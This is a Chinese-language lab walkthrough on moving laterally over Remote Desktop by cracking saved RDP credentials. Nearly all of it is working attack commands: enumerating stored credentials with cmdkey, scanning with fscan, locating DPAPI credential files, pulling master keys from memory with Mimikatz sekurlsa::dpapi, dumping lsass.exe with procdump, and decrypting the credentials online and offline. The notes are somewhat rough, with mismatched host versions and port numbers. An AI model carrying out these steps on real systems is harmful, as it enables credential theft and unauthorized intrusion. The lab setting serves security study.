通过远程桌面横向移动（破解凭证）

环境配置

win10 192.168.7.36 10.10.10.128
win7 10.10.10.129 -- 3389
使用windows2019链接2012的远程桌面，注意一定要勾选记住我的凭证，勾选记住我的凭证，勾选记住的我凭证

windows10

windows7

远程桌面链接

凭据的信息收集

cmdkey /list

端口扫描

发现3306端口开启

fscan.exe -h 10.10.10.129 > 1.txt

破解远程桌面凭据 -- 在线

查看凭据文件的绝对路径

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
dir /a \users\admin1$\AppData\Local\Microsoft\Credentials\*

此处较小的是凭证文件

获取凭据的masterkey的guid值（读取凭证文件）

dpapi::cred /in:C:\Users\admin1$\AppData\Local\Microsoft\Credentials\89321D2BF8044A4FB40A2DA8D6B8CCF3

获取内存中所有的MasterKey

privilege::debug
sekurlsa::dpapi

破解

dpapi::cred /in:凭据的绝对路径 /masterkey:materkey的值
dpapi::cred /in:C:\Users\admin1$\AppData\Local\Microsoft\Credentials\89321D2BF8044A4FB40A2DA8D6B8CCF3 /masterkey:4de49b0ac0eb9b0e70f502e58efb27c5369a93c12432aa37e1664daea5718afda1b587c9dde6581dc9cd313ae1b7ddb2a718d7b7a98b74ddbae716213d9475e6

破解凭据 -- 离线

查看凭据文件的绝对路径

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
dir /a \users\admin1$\AppData\Local\Microsoft\Credentials\*

下载目标主机的lsass.exe进程 -- 转储

注意：此处要使用管理员权限

procdump.exe -accepteula -ma lsass.exe lsass1.dump

注意此处将后缀的.dmp去除

准备好了两个文件 lsass.exe的转储文件lsass.dump文件

远程桌面的凭据文件：89321D2BF8044A4FB40A2DA8D6B8CCF3

将这两个文件下载到本地，在你的本地进行破解

将下载回来lsass.dump文件加载到你的内存中

Sekurlsa::minidump lsass1.dump

获取凭据的masterkey的guid值

dpapi::cred /in:89321D2BF8044A4FB40A2DA8D6B8CCF3

获取内存中所有的MasterKey

sekurlsa::dpapi

破解

把文件拖到桌面上

dpapi::cred /in:C:\Users\18484\Desktop\89321D2BF8044A4FB40A2DA8D6B8CCF3 /masterkey:4de49b0ac0eb9b0e70f502e58efb27c5369a93c12432aa37e1664daea5718afda1b587c9dde6581dc9cd313ae1b7ddb2a718d7b7a98b74ddbae716213d9475e6